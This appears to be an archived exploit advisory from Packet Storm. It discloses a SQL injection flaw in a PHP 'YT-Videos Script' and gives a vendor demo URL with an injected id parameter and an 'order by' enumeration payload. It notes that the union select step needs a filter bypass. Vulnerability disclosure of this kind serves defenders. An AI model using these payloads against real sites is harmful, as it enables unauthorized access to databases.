YT-Videos Script suffers from a remote SQL injection vulnerability.
dcf32a936ee351602cd0e224bdc4b3b4d13bba3e5f93097dfdfab56f2da86adb# Exploit Title; YT-Videos Script SQL Injection Vulnerability
# Date ; 6/8/12
# Author ; 3spi0n
# Script Vendor or Software Link ;
http://www.hotscripts.com/listing/yt-videos-script/ -
http://www.webtoolsin.com/products-3-yt-videos-script.html
# Category ; Webapps
# Type ; SQL Injection [MySQLi]
# Tested on ; Ubuntu / Win7 / Backtrack
[#] Demo Analyzing ;
http://www.webtoolsin.com/demo/ytvideos/play.php?id=2' [MySQLi Vuln.]
[#] Vulnerable Details ;
- MySQLi Vulnerable on sites
Vulnerable File ; play.php?query= [query, variant of index.php file]
Exploit ;
Order by command = play.php?id=2+order+by+8
Union Select command = is forbidden, you must a bypass.
[#] Greetz ;
- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed